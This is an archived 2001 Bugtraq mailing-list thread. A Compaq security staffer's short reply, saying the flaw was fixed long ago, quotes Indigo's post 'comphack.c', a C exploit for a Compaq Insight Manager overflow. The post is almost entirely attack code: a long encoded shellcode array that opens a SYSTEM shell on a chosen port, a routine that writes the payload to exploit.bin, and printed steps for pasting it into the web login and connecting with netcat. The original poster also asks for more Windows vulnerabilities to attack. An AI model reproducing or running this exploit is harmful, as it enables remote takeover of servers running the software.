[23432] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post
re: comphack - Compaq Insight Manager Remote SYSTEM shell

daemon@ATHENA.MIT.EDU (Boren, Rich (SSRT))
Fri Dec 7 19:12:31 2001

content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Date: Fri, 7 Dec 2001 16:06:43 -0700
Message-ID: <0575B1F095782C48A1FC464F30C79E4D01C61888@cxoexc12.americas.cpqcorp.net>
From: "Boren, Rich (SSRT)" <Rich.Boren@COMPAQ.com>
To: <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit

re:  comphack - Compaq Insight Manager Remote SYSTEM shell

This has been fixed for at least 18 months.  We suggest that you
get the current release of software of agents and Compaq Insight
manager. Version 5.2 or 5.1 it's on the web....
http://www.compaq.com/products/servers/management/
and so the are the old advisories...
www.compaq.com/products/servers/management/system-advisories.html

regards,
Rich


-----Original Message-----
From: Indigo [mailto:indig0@talk21.com]
Sent: Thursday, November 29, 2001 4:55 AM
To: bugtraq@securityfocus.com
Subject: comphack - Compaq Insight Manager Remote SYSTEM shell


Mailer: SecurityFocus

I'm running out of Win32 vulnerabilities to exploit 

here...Anyone got any ideas?



Cheers,



Indigo.







/*	comphack.c - Compaq Insight Manager 

overflow exploit by Indigo <indig0@talk21.com> 2001



	Usage: comphack <victim port>



	This code has been compiled and tested 

on Linux and Win32



	The shellcode spawns a SYSTEM shell on 

the chosen port



	Main shellcode adapted from code written 

by izan@deepzone.org



	Greets to:



	Morphsta, Br00t, Macavity, Jacob & 

Monkfish...Not forgetting D-Niderlunds

*/



/* #include <windows.h> uncomment if compiling on 

Win32 */

#include <stdio.h>



int main(int argc, char **argv)

{

				

unsigned char shellcode[] = 



"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61

\x61\x61\x61\x61"

"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77

\xFF\xE1\x03\x10"

"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7

\x31\xC9\xB1\x6F"

"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07

\x31\xDB\xB3\x18"

"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3

\x1D\x01\xDF\x29\x07"

"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07

\xB3\x05\x01\xDF"

"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07

\xB3\x12\x01\xDF"

"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01

\xDF\x29\x07\xB3\x14"

"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3

\x3F\x01\xDF\x29\x07"

"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07

\xB3\x08\x01\xDF"

"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01

\xDF\x29\x07\x66\x81"

"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07

\x47\x47\x47\x47"

"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7

\x5F\x5F\x5F\x5F"

"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2

\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"

"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7

\xAD\x5D\x5F\x5F\xD2"

"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35

\x55\xCF\xCF\xCF"

"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6

\x7A\x1F\x5F\x09"

"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6

\x7A\x1F\x5F\x09\xA0\xCA"

"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6

\x7A\x1F\x5F\x09\xD2\xEA\xB2"

"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0

\xCA\x6C\x7A\x1F"

"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2

\xEA\xAA\x7A\x1F"

"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79

\x1F\x5F\xF2\x0F"

"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79

\x1F\x5F\xF2\x0F\xA0\xCA"

"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2

\xE2\x72\x79\x1F\x5F"

"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2

\x6E\x79\x1F\x5F\xF4\xD2"

"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79

\x1F\x5F\x5F\x5F\x5F\x5F"

"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2

\xEA\x66\x79\x1F\x5F"

"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35

\x5F\x35\x4F\x35\x5E"

"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35

\x5F\xA0\xCA\x64"

"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37

\x5F\x5D\x5F\x5F\xA0\xCA"

"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79

\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"

"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2

\xEA\xB6\x7A\x1F"

"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35

\x5C\x0C\xA0\xCA\x5D\x7A"

"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6

\x7A\x1F\x5F\x09"

"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79

\x1F\x5F\xF4\x6C\xBF"

"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2

\xEA\xB6\x7A\x1F"

"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0

\xCA\x10\x7A\x1F"

"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2

\x3A\x79\x1F\x5F\x08"

"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0

\xCA\x60\x7A\x1F"

"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2

\x3A\x79\x1F\x5F\x5D"

"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79

\x1F\x5F\x5E\x7F\x5F\x5F"

"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79

\x1F\x5F\x5F\x7F\x5F\x5F"

"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79

\x1F\x5F\x08\x0F"

"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6

\x7A\x1F\x5F\xF2\x0F\xA0"

"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10

\x7A\x1F\x5F\xD4\xDA\x3A"

"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79

\x1F\x5F\xF2\x0F\xD2\xEA"

"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55

\x7A\x1F\x5F\x35\x5F\xD2\xE2"

"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2

\xEA\xB6\x7A\x1F"

"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0

\xCA\x10\x7A\x1F"

"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38

\xA0\xA0\xA0\x35"

"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79

\x1F\x5F\xF2\x0F\xD2"

"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51

\x7A\x1F\x5F\xD6\xDA\x3E"

"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08

\x0F\xD2\xEA\x0E"

"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2

\x0F\xA0\xCA\x14"

"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35

\x5F\xD4\xDA\x3E"

"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4

\xDA\x0E\x79\x1F"

"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0

\xCA\x18\x7A\x1F\x5F"

"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0

\xA0\xD2\xEA\x06"

"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2

\xEA\x02\x79\x1F"

"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0

\xCA\x08\x7A\x1F"

"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0

\x4D\x0F\x04\x06\x08"

"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0

\x4D\x0F\xF3\xDB"

"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10

\x1C\x14\x6C\x6D"

"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31

\x3B\x5F\x33\x36\x2C"

"\x2B\x3A\x31

\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31

\x3B\x5F"

"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30

\x3C\x34\x3A\x2B"

"\x5F\x14\x1A\x2D\x11\x1A\x13

\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"

"\x0F\x36\x2F\x3A\x5F\x18

\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"

"\x31\x39\x30

\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30

\x3C\x3A"

"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32

\x3A\x3B\x0F\x36\x2F"

"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30

\x3C\x5F\x2D\x3A"

"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36

\x2B\x3A\x19\x36\x33\x3A"

"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30

\x2C\x3A\x17\x3E\x31\x3B"

"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30

\x3C\x3A\x2C\x2C\x5F\x1C"

"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31

\x7F\x63\x36\x25"

"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71

\x30\x2D\x38\x61"

"\x5D\x5F\x40\x17

\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"

"\x53

\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x

5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x1C\x12\x1B\x71\x1A\x07

\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"

"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\

x5F\x5F\x5F\x5F"

"\x56\x56\x56\x56\x56\x00";

		

FILE *fp;

unsigned short int      a_port;



printf ("\nCompaq Insight Manager overflow 

launcher\nby Indigo <indig0@talk21.com> 2001\n\n");

printf ("This program will generate a binary file called 

exploit.bin\n");

printf ("Connect to the victim using a web browser 

http://victim:2301\n");

printf ("Next to \'Login Account\', click on 

\'anonymous\'\n");

printf ("Enter some random characters into the 

\'password\' field\n");

printf ("Open exploit.bin in notepad, highlight it then 

copy to the clipboard\n");

printf ("Paste the exploit into the \'Name\' field and 

click OK\n");

printf ("\nLaunch netcat: nc <victim host> <victim 

port>\n");

printf ("\nThe exploit spawns a SYSTEM shell on the 

chosen port\n\n");



if (argc != 2)

{

	printf ("Usage: %s <victim port>\n", argv[0]);

	exit (0);

}



a_port = htons(atoi(argv[1]));

a_port^= 0x5f5f;

       

shellcode[1650]= (a_port) & 0xff;

shellcode[1651]= (a_port >> 8) & 0xff;



fp = fopen ("./exploit.bin","wb");



fputs (shellcode,fp);



fclose (fp);

	

return 0;



}

home	help	back	first	fref	pref	prev	next	nref	lref	last	post
[23432] in bugtraq

re: comphack - Compaq Insight Manager Remote SYSTEM shell

daemon@ATHENA.MIT.EDU (Boren, Rich (SSRT))Fri Dec 7 19:12:31 2001

daemon@ATHENA.MIT.EDU (Boren, Rich (SSRT))
Fri Dec 7 19:12:31 2001
